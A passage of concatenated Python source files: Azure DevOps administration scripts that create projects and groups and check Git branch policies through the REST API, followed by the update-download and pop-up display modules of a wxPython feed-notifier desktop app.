"name": f"{ARGS.projectName}",
"description": f"{ARGS.projectDescription}",
"visibility": "private",
"capabilities": {
"versioncontrol": {"sourceControlType": "Git"},
"processTemplate": {"templateTypeId": f"{ARGS.processTemplate}"},
},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 202:
print(f"[INFO] Project {ARGS.projectName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Project {ARGS.projectName} has not been created"
)
sys.exit(1)
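# Example invocation (illustrative values; the default --processTemplate GUID
# above refers to one of the built-in process templates):
#   python common/create_project.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --projectDescription "Demo project" --pat <token>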
|
kagarlickij/azuredevops-security-automation | common/set_git_policy.py | <filename>common/set_git_policy.py
"""
This script sets a cross-repo Git policy
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--minApproverCount", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/{}/_apis/policy/configurations?api-version=5.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
NULL = None
DATA = {
"isEnabled": "true",
"isBlocking": "true",
"type": {"id": "fa4e907d-c16b-4a4c-9dfa-4906e5d171dd"},
"settings": {
"minimumApproverCount": f"{ARGS.minApproverCount}",
"creatorVoteCounts": "false",
"scope": [
{"refName": "refs/heads/master", "matchKind": "exact", "repositoryId": NULL}
],
},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
print("[INFO] Cross-repo Git policy has been set successfully")
|
kagarlickij/azuredevops-security-automation | cloud/create_group.py | <gh_stars>1-10
"""
This script creates a group in the project via the Azure DevOps API
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupDescription", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print(f"[INFO] Creating {ARGS.groupName} group..")
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {"displayName": f"{ARGS.groupName}", "description": f"{ARGS.groupDescription}"}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 201:
print(f"[INFO] Group {ARGS.groupName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Group {ARGS.groupName} has not been created"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | cloud/export_group_info.py | """
This script gets and exports the SID of the Azure DevOps group
"""
import json
import argparse
import sys
import base64
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_DESCRIPTOR = GROUP["descriptor"]
break
try:
GROUP_DESCRIPTOR
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group..")
DESCRIPTOR = GROUP_DESCRIPTOR.split("vssgp.", 1)[1]
for SYM in DESCRIPTOR.split("."):
SID = base64.b64decode(SYM + "=" * (-len(SYM) % 4)).decode("utf-8")
print(f"[INFO] Group {ARGS.groupName} SID = {SID}")
print(f"##vso[task.setvariable variable={ARGS.groupSid}]{SID}")
|
kagarlickij/azuredevops-security-automation | cloud/delete_group.py | <gh_stars>1-10
"""
This script deletes a group in the project via the Azure DevOps API
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_DESCRIPTOR = GROUP["descriptor"]
break
try:
GROUP_DESCRIPTOR
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Deleting {ARGS.groupName} group..")
URL = "{}/_apis/graph/groups/{}?api-version=5.0-preview.1".format(
ARGS.organization, GROUP_DESCRIPTOR
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.delete(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print(f"[INFO] {ARGS.groupName} group has been deleted successfully")
else:
print(
f"##vso[task.logissue type=error] {ARGS.groupName} group has not been deleted successfully"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/export_feed_info.py | <filename>common/export_feed_info.py<gh_stars>1-10
"""
This script exports the Feed ID
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
FEEDS = RESPONSE.json()["value"]
for FEED in FEEDS:
if FEED["name"] == ARGS.feedName:
FEED_ID = FEED["id"]
break
try:
FEED_ID
except NameError:
print(f"##vso[task.logissue type=error] Feed {ARGS.feedName} was not found")
sys.exit(1)
else:
print(f"[INFO] Feed {ARGS.feedName} ID = {FEED_ID}")
print(f"##vso[task.setvariable variable=feedId]{FEED_ID}")
|
kagarlickij/azuredevops-security-automation | common/check_git_policy.py | """
This script checks whether all git repos in the project follow best practices
"""
import json
import argparse
import sys
from datetime import date
from datetime import datetime
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--maxCommitAge", type=str, required=True)
PARSER.add_argument("--maxPullRequestAge", type=str, required=True)
PARSER.add_argument("--minApproverCount", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
HEADERS = {
"Content-Type": "application/json",
}
URL = "{}/{}/_apis/git/repositories?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
with open("./common/excluded_repos.txt") as text_file:
EXCLUDED_REPOS = text_file.read().splitlines()
print(f"[INFO] Excluded repos: {EXCLUDED_REPOS}")
ERROR_COUNTER = list()
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
REPOS = RESPONSE.json()["value"]
for REPO in REPOS:
REPO_NAME = REPO["name"]
print(f"\n[INFO] Checking {REPO_NAME} repo..")
REPO_ID = REPO["id"]
if REPO["name"] in EXCLUDED_REPOS:
print(f"[INFO] Repo {REPO_NAME} is excluded")
else:
DATE_FORMAT = "%Y-%m-%d"
URL = "{}/{}/_apis/git/repositories/{}/refs?api-version=5.0".format(
ARGS.organization, ARGS.projectName, REPO_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
BRANCHES = RESPONSE.json()["value"]
UNKNOWN_BRANCHES = list()
OUTDATED_BRANCHES = list()
OUTDATED_PRS = list()
for BRANCH in BRANCHES:
BRANCH_NAME = BRANCH["name"]
BRANCH_SHORTNAME = BRANCH_NAME.replace("refs/heads/", "")
if "feature/" in BRANCH_SHORTNAME or "bugfix/" in BRANCH_SHORTNAME:
URL = "{}/_apis/git/repositories/{}/commits?searchCriteria.itemVersion.version={}&api-version=5.0".format(
ARGS.organization, REPO_ID, BRANCH_SHORTNAME
)
try:
RESPONSE = requests.get(
URL, headers=HEADERS, auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(
f"##vso[task.logissue type=error] Response code: {CODE}"
)
print(
f"##vso[task.logissue type=error] Response message: {MESSAGE}"
)
sys.exit(1)
else:
LATEST_COMMIT_ID = RESPONSE.json()["value"][0]["commitId"]
LATEST_COMMIT_DATE = RESPONSE.json()["value"][0][
"committer"
]["date"]
LATEST_COMMIT_SHORT_DATE = LATEST_COMMIT_DATE.split("T")[0]
LATEST_COMMIT_SHORT_DATE_TIME = datetime.strptime(
LATEST_COMMIT_SHORT_DATE, DATE_FORMAT
)
CURRENT_DATE = date.today().strftime("%Y-%m-%d")
CURRENT_DATE_TIME = datetime.strptime(
CURRENT_DATE, DATE_FORMAT
)
LATEST_COMMIT_AGE = (
CURRENT_DATE_TIME - LATEST_COMMIT_SHORT_DATE_TIME
)
if int(LATEST_COMMIT_AGE.days) > int(ARGS.maxCommitAge):
print(
f"##vso[task.logissue type=error] Latest commit {LATEST_COMMIT_ID} is too old: {LATEST_COMMIT_AGE.days} day(s)"
)
OUTDATED_BRANCHES.append(BRANCH_SHORTNAME)
else:
pass
elif BRANCH_SHORTNAME == "master":
pass
elif "refs/tags/v" in BRANCH_NAME:
pass
elif "refs/pull/" in BRANCH_NAME:
pass
else:
UNKNOWN_BRANCHES.append(BRANCH_NAME)
URL = "{}/{}/_apis/git/repositories/{}/pullrequests?api-version=5.0".format(
ARGS.organization, ARGS.projectName, REPO_ID
)
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(
f"##vso[task.logissue type=error] Response message: {MESSAGE}"
)
sys.exit(1)
else:
PRS = RESPONSE.json()["value"]
for PR in PRS:
PR_ID = PR["pullRequestId"]
PR_DRAFT_STATUS = PR["isDraft"]
if not PR_DRAFT_STATUS: # Don't need to check Draft PRs
PR_DATE = PR["creationDate"]
PR_SHORT_DATE = PR_DATE.split("T")[0]
PR_SHORT_DATE_TIME = datetime.strptime(
PR_SHORT_DATE, DATE_FORMAT
)
CURRENT_DATE = date.today().strftime("%Y-%m-%d")
CURRENT_DATE_TIME = datetime.strptime(
CURRENT_DATE, DATE_FORMAT
)
PR_AGE = CURRENT_DATE_TIME - PR_SHORT_DATE_TIME
if int(PR_AGE.days) > int(ARGS.maxPullRequestAge):
OUTDATED_PRS.append(PR_ID)
else:
pass
else:
pass
if len(UNKNOWN_BRANCHES) == 0:
print("[INFO] All branch names follow standard")
else:
print(
f"##vso[task.logissue type=warning] Branch names that do not follow standard: {UNKNOWN_BRANCHES}"
)
if len(OUTDATED_BRANCHES) == 0:
print("[INFO] All branches are up to date")
else:
print(
f"##vso[task.logissue type=warning] Outdated branches: {OUTDATED_BRANCHES}"
)
if len(OUTDATED_PRS) == 0:
print("[INFO] All Pull requests are up to date")
else:
print(
f"##vso[task.logissue type=warning] Outdated Pull requests: {OUTDATED_PRS}"
)
URL = "{}/{}/_apis/policy/configurations?api-version=5.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
BRANCH_POLICY_COUNT = RESPONSE.json()["count"]
if int(BRANCH_POLICY_COUNT) > 0:
MATCH_KIND = RESPONSE.json()["value"][0]["settings"]["scope"][0]["matchKind"]
REPO_ID = RESPONSE.json()["value"][0]["settings"]["scope"][0]["repositoryId"]
APPROVERS_COUNT = RESPONSE.json()["value"][0]["settings"][
"minimumApproverCount"
]
if (
MATCH_KIND == "Exact"
and REPO_ID is None
and APPROVERS_COUNT >= int(ARGS.minApproverCount)
):
print(
f"[INFO] default branch has reviewers policy assigned, minimum number of reviewers is {APPROVERS_COUNT}"
)
else:
print(
"##vso[task.logissue type=error] default branch does not have valid reviewers policy assigned"
)
print(f"[DEBUG] MATCH_KIND = {MATCH_KIND}")
print(f"[DEBUG] REPO_ID = {REPO_ID}")
print(f"[DEBUG] APPROVERS_COUNT = {APPROVERS_COUNT}")
sys.exit(1)
else:
print(
"##vso[task.logissue type=error] default branch does not have policies assigned"
)
sys.exit(1)
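# Example invocation (illustrative values; ages are in days, and the script
# exits non-zero when the default-branch policy check fails):
#   python common/check_git_policy.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --maxCommitAge 14 --maxPullRequestAge 7 \
#       --minApproverCount 2 --pat <token>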
|
kagarlickij/azuredevops-security-automation | cloud/get_group_members.py | <filename>cloud/get_group_members.py
"""
This script gets the current quantity of group members and compares it with the desired quantity
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--desiredMembersQuantity", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "https://vssps.dev.azure.com/{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_ID = GROUP["originId"]
break
try:
GROUP_ID
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group..")
URL = "https://vsaex.dev.azure.com/{}/_apis/GroupEntitlements/{}/members?api-version=5.0-preview.1".format(
ARGS.organization, GROUP_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
    except requests.exceptions.RequestException as err:
        print(f"##vso[task.logissue type=error] {err}")
        # Only HTTP errors carry a response body; connection errors leave it unset.
        if getattr(err, "response", None) is not None:
            RESPONSE_TEXT = json.loads(err.response.text)
            CODE = RESPONSE_TEXT.get("errorCode")
            MESSAGE = RESPONSE_TEXT.get("message")
            print(f"##vso[task.logissue type=error] Response code: {CODE}")
            print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
        sys.exit(1)
else:
CURRENT_MEMBERS = RESPONSE.json()["members"]
CURRENT_MEMBERS_QUANTITY = len(CURRENT_MEMBERS)
if CURRENT_MEMBERS_QUANTITY == int(ARGS.desiredMembersQuantity):
print("[INFO] Current members quantity match desired")
else:
print(
"##vso[task.logissue type=error] Current members quantity does not match desired"
)
print(
f"##vso[task.logissue type=error] Desired members quantity = {ARGS.desiredMembersQuantity}"
)
print(
f"##vso[task.logissue type=error] Current members quantity = {CURRENT_MEMBERS_QUANTITY}"
)
print(
f"##vso[task.logissue type=error] Current members = {CURRENT_MEMBERS}"
)
sys.exit(1)
|
yabhinav/FeedNotifier | updater.py | import wx
import os
import time
import urllib
import tempfile
import util
from settings import settings
class CancelException(Exception):
pass
class DownloadDialog(wx.Dialog):
def __init__(self, parent):
super(DownloadDialog, self).__init__(parent, -1, 'Feed Notifier Update')
util.set_icon(self)
self.path = None
text = wx.StaticText(self, -1, 'Downloading update, please wait...')
self.gauge = wx.Gauge(self, -1, 100, size=(250, 16))
cancel = wx.Button(self, wx.ID_CANCEL, 'Cancel')
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(text)
sizer.AddSpacer(8)
sizer.Add(self.gauge, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(cancel, 0, wx.ALIGN_RIGHT)
wrapper = wx.BoxSizer(wx.VERTICAL)
wrapper.Add(sizer, 1, wx.EXPAND|wx.ALL, 10)
self.SetSizerAndFit(wrapper)
self.start_download()
def start_download(self):
util.start_thread(self.download)
def download(self):
try:
self.path = download_installer(self.listener)
wx.CallAfter(self.EndModal, wx.ID_OK)
except CancelException:
pass
except Exception:
wx.CallAfter(self.on_fail)
def on_fail(self):
dialog = wx.MessageDialog(self, 'Failed to download updates. Nothing will be installed at this time.', 'Update Failed', wx.OK|wx.ICON_ERROR)
dialog.ShowModal()
dialog.Destroy()
self.EndModal(wx.ID_CANCEL)
def update(self, percent):
if self:
self.gauge.SetValue(percent)
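    # NB: wxPython window references evaluate as False once the underlying
    # C++ widget has been destroyed, so `if self:` here and below doubles
    # as a check that the dialog is still alive.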
    def listener(self, blocks, block_size, total_size):
        size = blocks * block_size
        # total_size is -1 when the server sends no Content-Length; clamp so
        # the gauge never receives an out-of-range value.
        percent = min(100, size * 100 / total_size) if total_size > 0 else 0
        if self:
            wx.CallAfter(self.update, percent)
        else:
            raise CancelException
def get_remote_revision():
    f = None
    try:
        f = urllib.urlopen(settings.REVISION_URL)
        return int(f.read().strip())
    except Exception:
        return -1
    finally:
        if f:
            f.close()
def download_installer(listener):
fd, path = tempfile.mkstemp('.exe')
os.close(fd)
path, headers = urllib.urlretrieve(settings.INSTALLER_URL, path, listener)
return path
def should_check():
last_check = settings.UPDATE_TIMESTAMP
now = int(time.time())
elapsed = now - last_check
return elapsed >= settings.UPDATE_INTERVAL
def should_update(force):
if not force:
if not should_check():
return False
now = int(time.time())
settings.UPDATE_TIMESTAMP = now
local = settings.LOCAL_REVISION
remote = get_remote_revision()
if local < 0 or remote < 0:
return False
return remote > local
def do_check(controller, force=False):
if should_update(force):
wx.CallAfter(do_ask, controller)
elif force:
wx.CallAfter(do_tell, controller)
def do_ask(controller):
dialog = wx.MessageDialog(None, 'Feed Notifier software updates are available. Download and install now?', 'Update Feed Notifier?', wx.YES_NO|wx.YES_DEFAULT|wx.ICON_QUESTION)
if dialog.ShowModal() == wx.ID_YES:
do_download(controller)
dialog.Destroy()
def do_tell(controller):
dialog = wx.MessageDialog(None, 'No software updates are available at this time.', 'No Updates', wx.OK|wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def do_download(controller):
dialog = DownloadDialog(None)
dialog.Center()
result = dialog.ShowModal()
path = dialog.path
dialog.Destroy()
if result == wx.ID_OK:
do_install(controller, path)
def do_install(controller, path):
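    # The switches are Inno Setup-style installer flags: skip the start
    # page, run silently, and suppress any reboot prompt.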
controller.close()
time.sleep(1)
os.execvp(path, (path, '/sp-', '/silent', '/norestart'))
def run(controller, force=False):
if force or settings.CHECK_FOR_UPDATES:
util.start_thread(do_check, controller, force)
|
yabhinav/FeedNotifier | popups.py | import wx
import webbrowser
from settings import settings
BLANK = 'about:blank'
COMMAND_CLOSE = 'http://close/'
COMMAND_NEXT = 'http://next/'
COMMAND_PREVIOUS = 'http://previous/'
COMMAND_FIRST = 'http://first/'
COMMAND_LAST = 'http://last/'
COMMAND_PLAY = 'http://play/'
COMMAND_PAUSE = 'http://pause/'
def position_window(window):
index = settings.POPUP_DISPLAY
if index >= wx.Display_GetCount():
index = 0
display = wx.Display(index)
x, y, w, h = display.GetClientArea()
cw, ch = window.GetSize()
pad = 10
x1 = x + pad
y1 = y + pad
x2 = x + w - cw - pad
y2 = y + h - ch - pad
x3 = x + w / 2 - cw / 2
y3 = y + h / 2 - ch / 2
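    # POPUP_POSITION encodes a screen corner as a sign pair:
    # (-1, -1) upper-left, (1, -1) upper-right, (-1, 1) lower-left,
    # (1, 1) lower-right, (0, 0) centered.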
lookup = {
(-1, -1): (x1, y1),
(1, -1): (x2, y1),
(-1, 1): (x1, y2),
(1, 1): (x2, y2),
(0, 0): (x3, y3),
}
window.SetPosition(lookup[settings.POPUP_POSITION])
class Event(wx.PyEvent):
def __init__(self, event_object, type):
super(Event, self).__init__()
self.SetEventType(type.typeId)
self.SetEventObject(event_object)
EVT_LINK = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_CLOSE = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_ENTER = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_LEAVE = wx.PyEventBinder(wx.NewEventType())
class PopupManager(wx.EvtHandler):
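    # Drives the pop-up slideshow: keeps a small cache of frames around the
    # current item, auto-advances on a timer, and pauses while hovered.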
def __init__(self):
super(PopupManager, self).__init__()
self.timer = None
self.auto = settings.POPUP_AUTO_PLAY
self.cache = {}
self.hover_count = 0
def set_items(self, items, index=0, focus=False):
self.items = list(items)
self.index = index
self.count = len(self.items)
self.clear_cache(keep_current_item=True)
self.update(focus)
self.set_timer()
def update(self, focus=False):
item = self.items[self.index]
if item in self.cache:
self.show_frame(focus)
self.update_cache()
else:
self.update_cache(True)
self.show_frame(focus)
self.update_cache()
def update_cache(self, current_only=False):
indexes = set()
indexes.add(self.index)
if not current_only:
indexes.add(self.index - 1)
indexes.add(self.index + 1)
#indexes.add(0)
#indexes.add(self.count - 1)
items = set(self.items[index] for index in indexes if index >= 0 and index < self.count)
for item in items:
if item in self.cache:
continue
frame = self.create_frame(item)
self.cache[item] = frame
        # iterate over a snapshot so stale entries can be deleted safely
        for item, frame in list(self.cache.items()):
            if item not in items:
                frame.Close()
                del self.cache[item]
    def clear_cache(self, keep_current_item=False):
        current_item = self.items[self.index]
        for item, frame in list(self.cache.items()):
            if keep_current_item and item == current_item:
                continue
            frame.Close()
            del self.cache[item]
def show_frame(self, focus=False):
current_item = self.items[self.index]
current_item.read = True
for item, frame in self.cache.items():
if item == current_item:
if focus:
frame.Show()
else:
frame.Disable()
frame.Show()
frame.Enable()
frame.Update()
if settings.POPUP_TRANSPARENCY < 255:
frame.SetTransparent(settings.POPUP_TRANSPARENCY)
for item, frame in self.cache.items():
if item != current_item:
frame.Hide()
    def create_frame(self, item):
        # Only the default theme is implemented; the POPUP_THEME setting is
        # reserved for future themes.
        import theme_default
        context = self.create_context(item)
        frame = theme_default.Frame(item, context)
        frame.Bind(EVT_LINK, self.on_link)
        frame.Bind(EVT_POPUP_ENTER, self.on_enter)
        frame.Bind(EVT_POPUP_LEAVE, self.on_leave)
        position_window(frame)
        if settings.POPUP_TRANSPARENCY < 255:
            frame.SetTransparent(0)
        return frame
def create_context(self, item):
context = {}
count = str(self.count)
        # zero-pad the index so it aligns with the total, e.g. 007 of 120
        index = str(self.items.index(item) + 1).zfill(len(count))
        context['item_index'] = index
context['item_count'] = count
context['is_playing'] = self.auto
context['is_paused'] = not self.auto
context['POPUP_WIDTH'] = settings.POPUP_WIDTH
context['COMMAND_CLOSE'] = COMMAND_CLOSE
context['COMMAND_NEXT'] = COMMAND_NEXT
context['COMMAND_PREVIOUS'] = COMMAND_PREVIOUS
context['COMMAND_FIRST'] = COMMAND_FIRST
context['COMMAND_LAST'] = COMMAND_LAST
context['COMMAND_PLAY'] = COMMAND_PLAY
context['COMMAND_PAUSE'] = COMMAND_PAUSE
return context
def set_timer(self):
if self.timer and self.timer.IsRunning():
return
duration = settings.POPUP_DURATION * 1000
self.timer = wx.CallLater(duration, self.on_timer)
def stop_timer(self):
if self.timer and self.timer.IsRunning():
self.timer.Stop()
self.timer = None
def on_enter(self, event):
event.Skip()
self.hover_count += 1
def on_leave(self, event):
event.Skip()
self.hover_count -= 1
def on_link(self, event):
link = event.link
# track the click
item = self.items[self.index]
feed = item.feed
if link == item.link or link == feed.link:
feed.clicks += 1
# handle the click
if link == BLANK:
event.Skip()
elif link == COMMAND_CLOSE:
self.on_close()
elif link == COMMAND_FIRST:
self.auto = False
self.on_first()
elif link == COMMAND_LAST:
self.auto = False
self.on_last()
elif link == COMMAND_NEXT:
self.auto = False
self.on_next()
elif link == COMMAND_PREVIOUS:
self.auto = False
self.on_previous()
elif link == COMMAND_PLAY:
if not self.auto:
self.auto = True
self.stop_timer()
self.on_timer()
elif link == COMMAND_PAUSE:
self.auto = False
else:
webbrowser.open(link)
def on_first(self):
self.index = 0
self.update(True)
def on_last(self):
self.index = self.count - 1
self.update(True)
def on_next(self, focus=True):
if self.index < self.count - 1:
self.index += 1
self.update(focus)
else:
self.on_close()
def on_previous(self):
